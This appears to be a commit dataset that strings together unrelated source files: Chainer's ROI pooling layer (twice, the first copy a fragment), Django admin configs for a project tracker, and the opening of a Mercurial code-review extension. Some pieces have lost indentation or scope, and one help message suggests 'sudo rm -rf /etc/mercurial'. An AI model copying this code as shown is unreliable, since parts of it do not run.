        # Elementwise kernel indexed over top_data; mirrors forward_cpu.
        cuda.cupy.ElementwiseKernel(
            '''
            raw float32 bottom_data, float32 spatial_scale, int32 channels,
            int32 height, int32 width, int32 pooled_height, int32 pooled_width,
            raw float32 bottom_rois
            ''',
            'float32 top_data, int32 argmax_data',
            '''
            // pos in output filter
            int pw = i % pooled_width;
            int ph = (i / pooled_width) % pooled_height;
            int c = (i / pooled_width / pooled_height) % channels;
            int num = i / pooled_width / pooled_height / channels;

            int roi_batch_ind = bottom_rois[num * 5 + 0];
            int roi_start_w = round(bottom_rois[num * 5 + 1] * spatial_scale);
            int roi_start_h = round(bottom_rois[num * 5 + 2] * spatial_scale);
            int roi_end_w = round(bottom_rois[num * 5 + 3] * spatial_scale);
            int roi_end_h = round(bottom_rois[num * 5 + 4] * spatial_scale);

            // Force malformed ROIs to be 1x1
            int roi_width = max(roi_end_w - roi_start_w + 1, 1);
            int roi_height = max(roi_end_h - roi_start_h + 1, 1);
            float bin_size_h = static_cast<float>(roi_height)
                           / static_cast<float>(pooled_height);
            float bin_size_w = static_cast<float>(roi_width)
                           / static_cast<float>(pooled_width);

            int hstart = static_cast<int>(floor(static_cast<float>(ph)
                                          * bin_size_h));
            int wstart = static_cast<int>(floor(static_cast<float>(pw)
                                          * bin_size_w));
            int hend = static_cast<int>(ceil(static_cast<float>(ph + 1)
                                        * bin_size_h));
            int wend = static_cast<int>(ceil(static_cast<float>(pw + 1)
                                        * bin_size_w));

            // Add roi offsets and clip to input boundaries
            hstart = min(max(hstart + roi_start_h, 0), height);
            hend = min(max(hend + roi_start_h, 0), height);
            wstart = min(max(wstart + roi_start_w, 0), width);
            wend = min(max(wend + roi_start_w, 0), width);
            bool is_empty = (hend <= hstart) || (wend <= wstart);

            // Define an empty pooling region to be zero
            float maxval = is_empty ? 0 : -1E+37;
            // If nothing is pooled, argmax=-1 causes nothing to be backprop'd
            int maxidx = -1;
            int data_offset = (roi_batch_ind * channels + c) * height * width;
            for (int h = hstart; h < hend; ++h) {
                for (int w = wstart; w < wend; ++w) {
                    int bottom_index = h * width + w;
                    if (bottom_data[data_offset + bottom_index] > maxval) {
                        maxval = bottom_data[data_offset + bottom_index];
                        maxidx = bottom_index;
                    }
                }
            }
            top_data = maxval;
            argmax_data = maxidx;
            ''', 'roi_poolig_2d_fwd'
        )(bottom_data, self.spatial_scale, channels, height, width,
          self.outh, self.outw, bottom_rois, top_data,
          self.argmax_data)

        return top_data,
def backward_cpu(self, inputs, gy):
    """CPU backward: scatter each pooled-output gradient back to the input
    element that won the forward max (recorded in self.argmax_data).

    Args:
        inputs: (bottom_data, bottom_rois); each ROI row is
            (batch_idx, xmin, ymin, xmax, ymax).
        gy: tuple whose first element is the gradient w.r.t. the pooled
            output, shape (n_rois, channels, outh, outw).

    Returns:
        (gradient w.r.t. bottom_data, None) -- ROIs receive no gradient.
    """
    bottom_data, bottom_rois = inputs
    channels, height, width = bottom_data.shape[1:]
    # BUG FIX: the loop must run over the number of ROIs, not
    # bottom_data.shape[0] (the batch size); the two only coincide by
    # accident. The GPU path already uses bottom_rois.shape[0].
    n_rois = bottom_rois.shape[0]
    bottom_delta = numpy.zeros_like(bottom_data, dtype=numpy.float32)
    for i_roi in range(n_rois):
        idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
        idx = int(idx)
        # Project ROI corners onto feature-map coordinates.
        xmin = int(round(xmin * self.spatial_scale))
        xmax = int(round(xmax * self.spatial_scale))
        ymin = int(round(ymin * self.spatial_scale))
        ymax = int(round(ymax * self.spatial_scale))
        # Force malformed ROIs to span at least one cell.
        roi_width = max(xmax - xmin + 1, 1)
        roi_height = max(ymax - ymin + 1, 1)
        strideh = float(roi_height) / float(self.outh)
        stridew = float(roi_width) / float(self.outw)
        # iterate all the w, h (from feature map) that fall into this ROIs
        for w in range(xmin, xmax + 1):
            for h in range(ymin, ymax + 1):
                # Pooled cells whose bins could contain (h, w), clipped
                # to the output grid.
                phstart = int(numpy.floor(float(h - ymin) / strideh))
                phend = int(numpy.ceil(float(h - ymin + 1) / strideh))
                pwstart = int(numpy.floor(float(w - xmin) / stridew))
                pwend = int(numpy.ceil(float(w - xmin + 1) / stridew))
                phstart = min(max(phstart, 0), self.outh)
                phend = min(max(phend, 0), self.outh)
                pwstart = min(max(pwstart, 0), self.outw)
                pwend = min(max(pwend, 0), self.outw)
                for ph in range(phstart, phend):
                    for pw in range(pwstart, pwend):
                        max_idx_tmp = self.argmax_data[i_roi, :, ph, pw]
                        for c in range(channels):
                            # Only the recorded argmax element gets the
                            # gradient for this pooled cell.
                            if max_idx_tmp[c] == (h * width + w):
                                bottom_delta[idx, c, h, w] += \
                                    gy[0][i_roi, c, ph, pw]
    return bottom_delta, None
def backward_gpu(self, inputs, gy):
    """GPU backward: one kernel element per input cell, accumulating the
    gradient from every ROI whose recorded argmax points at that cell.
    Returns (gradient w.r.t. bottom_data, None)."""
    bottom_data, bottom_rois = inputs
    channels, height, width = bottom_data.shape[1:]
    bottom_diff = cuda.cupy.zeros_like(bottom_data, dtype=numpy.float32)
    cuda.cupy.ElementwiseKernel(
        '''
raw float32 top_diff, raw int32 argmax_data, int32 num_rois,
float32 spatial_scale, int32 channels, int32 height, int32 width,
int32 pooled_height, int32 pooled_width, raw float32 bottom_rois
''',
        'float32 bottom_diff',
        '''
int w = i % width;
int h = (i / width) % height;
int c = (i / width / height) % channels;
int num = i / width / height / channels;
float gradient = 0;
// Accumulate gradient over all ROIs that pooled this element
for (int roi_n = 0; roi_n < num_rois; ++roi_n) {
// Skip if ROI's batch index doesn't match num
if (num != static_cast<int>(bottom_rois[roi_n * 5])) {
continue;
}
int roi_start_w = round(bottom_rois[roi_n * 5 + 1]
* spatial_scale);
int roi_start_h = round(bottom_rois[roi_n * 5 + 2]
* spatial_scale);
int roi_end_w = round(bottom_rois[roi_n * 5 + 3]
* spatial_scale);
int roi_end_h = round(bottom_rois[roi_n * 5 + 4]
* spatial_scale);
// Skip if ROI doesn't include (h, w)
const bool in_roi = (w >= roi_start_w && w <= roi_end_w &&
h >= roi_start_h && h <= roi_end_h);
if (!in_roi) {
continue;
}
int offset = (roi_n * channels + c) * pooled_height
* pooled_width;
// Compute feasible set of pooled units that could have pooled
// this bottom unit
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int phstart = floor(static_cast<float>(h - roi_start_h)
/ bin_size_h);
int phend = ceil(static_cast<float>(h - roi_start_h + 1)
/ bin_size_h);
int pwstart = floor(static_cast<float>(w - roi_start_w)
/ bin_size_w);
int pwend = ceil(static_cast<float>(w - roi_start_w + 1)
/ bin_size_w);
phstart = min(max(phstart, 0), pooled_height);
phend = min(max(phend, 0), pooled_height);
pwstart = min(max(pwstart, 0), pooled_width);
pwend = min(max(pwend, 0), pooled_width);
for (int ph = phstart; ph < phend; ++ph) {
for (int pw = pwstart; pw < pwend; ++pw) {
int index_ = ph * pooled_width + pw + offset;
if (argmax_data[index_] == (h * width + w)) {
gradient += top_diff[index_];
}
}
}
}
bottom_diff = gradient;
''', 'roi_pooling_2d_bwd'
    )(gy[0], self.argmax_data, bottom_rois.shape[0], self.spatial_scale,
      channels, height, width, self.outh, self.outw,
      bottom_rois, bottom_diff)
    return bottom_diff, None
def roi_pooling_2d(x, rois, outh, outw, spatial_scale):
    """Spatial Region of Interest (ROI) pooling function.

    Behaves like :class:`~functions.MaxPooling2D`, except that the maximum
    is taken over the spatial patch of each region of interest,
    independently per channel.

    Args:
        x (~chainer.Variable): Input variable.
        rois (~chainer.Variable): Input roi variable.
        outh (int): Height of output image after pooled.
        outw (int): Width of output image after pooled.
        spatial_scale (float): scale of the roi is resized.

    Returns:
        ~chainer.Variable: Output variable.
    """
    pooler = ROIPooling2D(outh, outw, spatial_scale)
    return pooler(x, rois)
Add license declaration and citation of the paper
# Modified work:
# -----------------------------------------------------------------------------
# Copyright (c) 2015 Preferred Infrastructure, Inc.
# Copyright (c) 2015 Preferred Networks, Inc.
# -----------------------------------------------------------------------------
# Original work of _roi_pooling_slice, forward_cpu and backward_cpu:
# -----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
# Original work of forward_gpu and backward_gpu:
# -----------------------------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see fast-rcnn/LICENSE for details]
# Written by Ross Girshick
# -----------------------------------------------------------------------------
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
def _roi_pooling_slice(size, stride, max_size, roi_offset):
    """Return the clipped source slice for pooled cell `size`, plus its length.

    The cell covers [floor(size*stride), ceil((size+1)*stride)) shifted by
    roi_offset and clamped into [0, max_size].
    """
    lo = int(numpy.floor(size * stride)) + roi_offset
    hi = int(numpy.ceil((size + 1) * stride)) + roi_offset
    lo = min(max(lo, 0), max_size)
    hi = min(max(hi, 0), max_size)
    return slice(lo, hi), hi - lo
class ROIPooling2D(function.Function):
    """RoI pooling over a set of 2d planes.

    Each region of interest (a row of `rois`:
    (batch_idx, xmin, ymin, xmax, ymax) in input-image coordinates) is
    divided into an outh x outw grid of bins and max-pooled per channel.
    The flat input index of each winning element is kept in
    self.argmax_data so the backward pass can route gradients.
    """

    def __init__(self, outh, outw, spatial_scale):
        # outh/outw: pooled output size; spatial_scale maps ROI
        # coordinates onto the feature map.
        self.outh, self.outw = outh, outw
        self.spatial_scale = spatial_scale

    def check_type_forward(self, in_types):
        # x: float32 with shape (batch, channels, h, w);
        # rois: float32 with shape (n_rois, 5).
        type_check.expect(in_types.size() == 2)
        x_type, roi_type = in_types
        type_check.expect(
            x_type.dtype == numpy.float32,
            x_type.ndim == 4,
            roi_type.dtype == numpy.float32,
            roi_type.ndim == 2,
            roi_type.shape[1] == 5,
        )

    def forward_cpu(self, inputs):
        """CPU forward: per-ROI, per-channel max pooling with argmax bookkeeping."""
        bottom_data, bottom_rois = inputs
        # BUG FIX: the ROI count is the number of rows of bottom_rois, not
        # bottom_data.shape[0] (the batch size); the two only coincide by
        # accident. The GPU path already does this.
        channels, height, width = bottom_data.shape[1:]
        n_rois = bottom_rois.shape[0]
        top_data = numpy.empty((n_rois, channels, self.outh, self.outw),
                               dtype=numpy.float32)
        self.argmax_data = numpy.empty_like(top_data).astype(numpy.int32)
        for i_roi in six.moves.range(n_rois):
            idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
            # Project ROI corners onto feature-map coordinates.
            xmin = int(round(xmin * self.spatial_scale))
            xmax = int(round(xmax * self.spatial_scale))
            ymin = int(round(ymin * self.spatial_scale))
            ymax = int(round(ymax * self.spatial_scale))
            # Force malformed ROIs to span at least one cell.
            roi_width = max(xmax - xmin + 1, 1)
            roi_height = max(ymax - ymin + 1, 1)
            strideh = 1. * roi_height / self.outh
            stridew = 1. * roi_width / self.outw
            for outh in six.moves.range(self.outh):
                sliceh, lenh = _roi_pooling_slice(
                    outh, strideh, height, ymin)
                if sliceh.stop <= sliceh.start:
                    continue
                for outw in six.moves.range(self.outw):
                    slicew, lenw = _roi_pooling_slice(
                        outw, stridew, width, xmin)
                    if slicew.stop <= slicew.start:
                        continue
                    roi_data = bottom_data[int(idx), :, sliceh, slicew]\
                        .reshape(channels, -1)
                    top_data[i_roi, :, outh, outw] =\
                        numpy.max(roi_data, axis=1)
                    # get the max idx respect to feature_maps coordinates
                    max_idx_slice = numpy.unravel_index(
                        numpy.argmax(roi_data, axis=1), (lenh, lenw))
                    max_idx_slice_h = max_idx_slice[0] + sliceh.start
                    max_idx_slice_w = max_idx_slice[1] + slicew.start
                    max_idx_slice = max_idx_slice_h * width + max_idx_slice_w
                    self.argmax_data[i_roi, :, outh, outw] = max_idx_slice
        return top_data,

    def forward_gpu(self, inputs):
        """GPU forward: one CUDA kernel element per pooled output cell."""
        bottom_data, bottom_rois = inputs
        channels, height, width = bottom_data.shape[1:]
        n_rois = bottom_rois.shape[0]
        top_data = cuda.cupy.empty((n_rois, channels, self.outh,
                                    self.outw), dtype=numpy.float32)
        self.argmax_data = cuda.cupy.empty_like(top_data).astype(numpy.int32)
        cuda.cupy.ElementwiseKernel(
            '''
raw float32 bottom_data, float32 spatial_scale, int32 channels,
int32 height, int32 width, int32 pooled_height, int32 pooled_width,
raw float32 bottom_rois
''',
            'float32 top_data, int32 argmax_data',
            '''
// pos in output filter
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int num = i / pooled_width / pooled_height / channels;
int roi_batch_ind = bottom_rois[num * 5 + 0];
int roi_start_w = round(bottom_rois[num * 5 + 1] * spatial_scale);
int roi_start_h = round(bottom_rois[num * 5 + 2] * spatial_scale);
int roi_end_w = round(bottom_rois[num * 5 + 3] * spatial_scale);
int roi_end_h = round(bottom_rois[num * 5 + 4] * spatial_scale);
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int hstart = static_cast<int>(floor(static_cast<float>(ph)
* bin_size_h));
int wstart = static_cast<int>(floor(static_cast<float>(pw)
* bin_size_w));
int hend = static_cast<int>(ceil(static_cast<float>(ph + 1)
* bin_size_h));
int wend = static_cast<int>(ceil(static_cast<float>(pw + 1)
* bin_size_w));
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart + roi_start_h, 0), height);
hend = min(max(hend + roi_start_h, 0), height);
wstart = min(max(wstart + roi_start_w, 0), width);
wend = min(max(wend + roi_start_w, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Define an empty pooling region to be zero
float maxval = is_empty ? 0 : -1E+37;
// If nothing is pooled, argmax=-1 causes nothing to be backprop'd
int maxidx = -1;
int data_offset = (roi_batch_ind * channels + c) * height * width;
for (int h = hstart; h < hend; ++h) {
for (int w = wstart; w < wend; ++w) {
int bottom_index = h * width + w;
if (bottom_data[data_offset + bottom_index] > maxval) {
maxval = bottom_data[data_offset + bottom_index];
maxidx = bottom_index;
}
}
}
top_data = maxval;
argmax_data = maxidx;
''', 'roi_poolig_2d_fwd'
        )(bottom_data, self.spatial_scale, channels, height, width,
          self.outh, self.outw, bottom_rois, top_data,
          self.argmax_data)
        return top_data,

    def backward_cpu(self, inputs, gy):
        """CPU backward: scatter gradients to the inputs recorded in argmax_data."""
        bottom_data, bottom_rois = inputs
        # BUG FIX: iterate over the ROI count, not the batch size
        # (see forward_cpu); the GPU path already uses bottom_rois.shape[0].
        channels, height, width = bottom_data.shape[1:]
        n_rois = bottom_rois.shape[0]
        bottom_delta = numpy.zeros_like(bottom_data, dtype=numpy.float32)
        for i_roi in six.moves.range(n_rois):
            idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
            idx = int(idx)
            xmin = int(round(xmin * self.spatial_scale))
            xmax = int(round(xmax * self.spatial_scale))
            ymin = int(round(ymin * self.spatial_scale))
            ymax = int(round(ymax * self.spatial_scale))
            roi_width = max(xmax - xmin + 1, 1)
            roi_height = max(ymax - ymin + 1, 1)
            strideh = float(roi_height) / float(self.outh)
            stridew = float(roi_width) / float(self.outw)
            # iterate all the w, h (from feature map) that fall into this ROIs
            for w in six.moves.range(xmin, xmax + 1):
                for h in six.moves.range(ymin, ymax + 1):
                    # Pooled cells whose bins could contain (h, w).
                    phstart = int(numpy.floor(float(h - ymin) / strideh))
                    phend = int(numpy.ceil(float(h - ymin + 1) / strideh))
                    pwstart = int(numpy.floor(float(w - xmin) / stridew))
                    pwend = int(numpy.ceil(float(w - xmin + 1) / stridew))
                    phstart = min(max(phstart, 0), self.outh)
                    phend = min(max(phend, 0), self.outh)
                    pwstart = min(max(pwstart, 0), self.outw)
                    pwend = min(max(pwend, 0), self.outw)
                    for ph in six.moves.range(phstart, phend):
                        for pw in six.moves.range(pwstart, pwend):
                            max_idx_tmp = self.argmax_data[i_roi, :, ph, pw]
                            for c in six.moves.range(channels):
                                # Only the recorded argmax gets gradient.
                                if max_idx_tmp[c] == (h * width + w):
                                    bottom_delta[idx, c, h, w] += \
                                        gy[0][i_roi, c, ph, pw]
        return bottom_delta, None

    def backward_gpu(self, inputs, gy):
        """GPU backward: one kernel element per input cell; accumulates the
        gradient from every ROI whose argmax points at that cell."""
        bottom_data, bottom_rois = inputs
        channels, height, width = bottom_data.shape[1:]
        bottom_diff = cuda.cupy.zeros_like(bottom_data, dtype=numpy.float32)
        cuda.cupy.ElementwiseKernel(
            '''
raw float32 top_diff, raw int32 argmax_data, int32 num_rois,
float32 spatial_scale, int32 channels, int32 height, int32 width,
int32 pooled_height, int32 pooled_width, raw float32 bottom_rois
''',
            'float32 bottom_diff',
            '''
int w = i % width;
int h = (i / width) % height;
int c = (i / width / height) % channels;
int num = i / width / height / channels;
float gradient = 0;
// Accumulate gradient over all ROIs that pooled this element
for (int roi_n = 0; roi_n < num_rois; ++roi_n) {
// Skip if ROI's batch index doesn't match num
if (num != static_cast<int>(bottom_rois[roi_n * 5])) {
continue;
}
int roi_start_w = round(bottom_rois[roi_n * 5 + 1]
* spatial_scale);
int roi_start_h = round(bottom_rois[roi_n * 5 + 2]
* spatial_scale);
int roi_end_w = round(bottom_rois[roi_n * 5 + 3]
* spatial_scale);
int roi_end_h = round(bottom_rois[roi_n * 5 + 4]
* spatial_scale);
// Skip if ROI doesn't include (h, w)
const bool in_roi = (w >= roi_start_w && w <= roi_end_w &&
h >= roi_start_h && h <= roi_end_h);
if (!in_roi) {
continue;
}
int offset = (roi_n * channels + c) * pooled_height
* pooled_width;
// Compute feasible set of pooled units that could have pooled
// this bottom unit
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int phstart = floor(static_cast<float>(h - roi_start_h)
/ bin_size_h);
int phend = ceil(static_cast<float>(h - roi_start_h + 1)
/ bin_size_h);
int pwstart = floor(static_cast<float>(w - roi_start_w)
/ bin_size_w);
int pwend = ceil(static_cast<float>(w - roi_start_w + 1)
/ bin_size_w);
phstart = min(max(phstart, 0), pooled_height);
phend = min(max(phend, 0), pooled_height);
pwstart = min(max(pwstart, 0), pooled_width);
pwend = min(max(pwend, 0), pooled_width);
for (int ph = phstart; ph < phend; ++ph) {
for (int pw = pwstart; pw < pwend; ++pw) {
int index_ = ph * pooled_width + pw + offset;
if (argmax_data[index_] == (h * width + w)) {
gradient += top_diff[index_];
}
}
}
}
bottom_diff = gradient;
''', 'roi_pooling_2d_bwd'
        )(gy[0], self.argmax_data, bottom_rois.shape[0], self.spatial_scale,
          channels, height, width, self.outh, self.outw,
          bottom_rois, bottom_diff)
        return bottom_diff, None
def roi_pooling_2d(x, rois, outh, outw, spatial_scale):
    """Spatial Region of Interest (ROI) pooling function.

    Acts like :class:`~functions.MaxPooling2D`, but takes the maximum over
    the spatial patch of each region of interest, per channel.

    Args:
        x (~chainer.Variable): Input variable.
        rois (~chainer.Variable): Input roi variable.
        outh (int): Height of output image after pooled.
        outw (int): Width of output image after pooled.
        spatial_scale (float): scale of the roi is resized.

    Returns:
        ~chainer.Variable: Output variable.

    See the original paper proposing ROIPooling:
    `Fast R-CNN <http://arxiv.org/abs/1504.08083>`_.
    """
    pooling = ROIPooling2D(outh, outw, spatial_scale)
    return pooling(x, rois)
|
Initial version of Pelican HTML sanity plugin.
This is needed by basically everything else, so it comes first.
|
from django.contrib import admin
from .models import *
class UserProfileAdmin(admin.ModelAdmin):
    # Admin configuration for UserProfile: grouped edit form sections,
    # change-list columns, and a filter on activity status.
    fieldsets = [
        (None, {'fields': ['user', 'fullname', 'githubuser', 'email','website']}),
        ('Biography', {'fields': ['bio']}),
        ('Activity', {'fields': ['active','activity_status']}),
    ]
    list_display = ('user', 'fullname', 'githubuser', 'activity_status')
    list_filter = ('activity_status',)
# Expose the models in the Django admin; only UserProfile uses a
# customized admin class here.
admin.site.register(Task)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(Project)
Customized projects and tasks in admin interface
from django.contrib import admin
from .models import *
class ProjectInline(admin.TabularInline):
    # Tabular inline editor for Project rows; used by UserProfileAdmin below.
    model = Project
class UserProfileAdmin(admin.ModelAdmin):
    # Admin configuration for UserProfile: grouped form sections,
    # change-list columns, an activity filter, and inline project editing.
    fieldsets = [
        (None, {'fields': ['user', 'fullname', 'githubuser', 'email','website']}),
        ('Biography', {'fields': ['bio']}),
        ('Activity', {'fields': ['active','activity_status']}),
    ]
    list_display = ('user', 'fullname', 'githubuser', 'activity_status')
    list_filter = ('activity_status',)
    inlines = [
        ProjectInline,
    ]
class ProjectAdmin(admin.ModelAdmin):
    # Admin configuration for Project: basic info plus a details section,
    # with list columns and a status filter.
    fieldsets = [
        (None, {'fields': ['project_name', 'status_id', 'project_owner']}),
        ('Project details', {'fields': ['project_description', 'project_deadline', 'repository_link', 'website_production', 'website_test', ]}),
    ]
    list_display = ('project_name', 'status_id', 'project_deadline',)
    list_filter = ('status_id',)
class TaskAdmin(admin.ModelAdmin):
    # Admin configuration for Task.
    # NOTE(review): the form edits 'owner_id'/'project_id' while the change
    # list displays and filters on 'assigned_id' -- confirm against the Task
    # model that all three field names exist and the mismatch is intentional.
    fieldsets = [
        (None, {'fields': ['title', 'status', 'owner_id', 'project_id']}),
        ('Task details', {'fields': ['description', 'deadline', ]}),
    ]
    list_display = ('title', 'status', 'assigned_id',)
    list_filter = ('assigned_id',)
# Register each model with its customized admin class.
admin.site.register(Task, TaskAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(Project, ProjectAdmin)
|
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re, time
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
# The standard 'json' package is new in Python 2.6.
# Before that it was an external package named simplejson.
try:
# Standard location in 2.6 and beyond.
import json
except Exception, e:
try:
# Conventional name for earlier package.
import simplejson as json
except:
try:
# Was also bundled with django, which is commonly installed.
from django.utils import simplejson as json
except:
# We give up.
raise e
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
try:
from mercurial.discovery import findcommonincoming
except:
def findcommonincoming(repo, remote):
return repo.findcommonincoming(remote)
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < '1.3':
msg = oldMessage
if os.access("/etc/mercurial", 0):
msg += linuxMessage
raise util.Abort(msg)
def promptyesno(ui, msg):
    """Ask the user a yes/no question; returns True for yes (the default)."""
    # Arguments to ui.prompt changed between 1.3 and 1.3.1.
    # Even so, some 1.3.1 distributions seem to have the old prompt!?!?
    # What a terrible way to maintain software.
    try:
        return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
    except AttributeError:
        # Older Mercurial: ui.prompt returns the answer text instead.
        return ui.prompt(msg, ["&yes", "&no"], "y") != "n"
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys

# This file is a Mercurial extension, not a program; refuse direct execution.
if __name__ == "__main__":
    print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
    sys.exit(2)

# Module-level state. `server` has a default; the rest are populated by
# code outside this chunk (presumably during extension setup -- confirm).
server = "codereview.appspot.com"
server_url_base = None
defaultcc = None
contributors = {}
missing_codereview = None
real_rollback = None
releaseBranch = None
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
    """Abort with a diagnostic unless s is exactly of type t (no subclasses)."""
    actual = type(s)
    if actual != t:
        raise util.Abort("type check failed: %s has type %s != %s" % (repr(s), actual, t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
    """Explicitly decode a UTF-8 byte string into a unicode string."""
    typecheck(s, str)
    decoded = s.decode("utf-8")
    return decoded
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
    """Force Mercurial's internal text encoding to UTF-8 instead of ascii."""
    from mercurial import encoding
    encoding.encoding = 'utf-8'

# Applied immediately at import time.
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
    """Switch Python's process-wide default string encoding to utf-8."""
    import sys
    reload(sys) # site.py deleted setdefaultencoding; get it back
    sys.setdefaultencoding('utf-8')

# Applied immediately at import time.
default_to_utf8()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
    """One change list: its description, files, reviewers, and the state of
    its local file and server-side issue."""
    def __init__(self, name):
        typecheck(name, str)
        self.name = name
        self.desc = ''
        self.files = []
        self.reviewer = []
        self.cc = []
        self.url = ''
        self.local = False
        self.web = False
        self.copied_from = None	# None means current user
        self.mailed = False
        self.private = False

    def DiskText(self):
        """Render the CL in the format stored on disk (read by ParseCL)."""
        cl = self
        s = ""
        if cl.copied_from:
            s += "Author: " + cl.copied_from + "\n\n"
        if cl.private:
            s += "Private: " + str(self.private) + "\n"
        s += "Mailed: " + str(self.mailed) + "\n"
        s += "Description:\n"
        s += Indent(cl.desc, "\t")
        s += "Files:\n"
        for f in cl.files:
            s += "\t" + f + "\n"
        typecheck(s, str)
        return s

    def EditorText(self):
        """Render the CL as presented in the user's editor (read by ParseCL)."""
        cl = self
        s = _change_prolog
        s += "\n"
        if cl.copied_from:
            s += "Author: " + cl.copied_from + "\n"
        if cl.url != '':
            s += 'URL: ' + cl.url + '	# cannot edit\n\n'
        if cl.private:
            s += "Private: True\n"
        s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "CC: " + JoinComma(cl.cc) + "\n"
        s += "\n"
        s += "Description:\n"
        if cl.desc == '':
            s += "\t<enter description here>\n"
        else:
            s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.local or cl.name == "new":
            s += "Files:\n"
            for f in cl.files:
                s += "\t" + f + "\n"
            s += "\n"
        typecheck(s, str)
        return s

    def PendingText(self):
        """Render a human-readable summary of the CL (for listings)."""
        cl = self
        s = cl.name + ":" + "\n"
        s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.copied_from:
            s += "\tAuthor: " + cl.copied_from + "\n"
        s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "\tCC: " + JoinComma(cl.cc) + "\n"
        s += "\tFiles:\n"
        for f in cl.files:
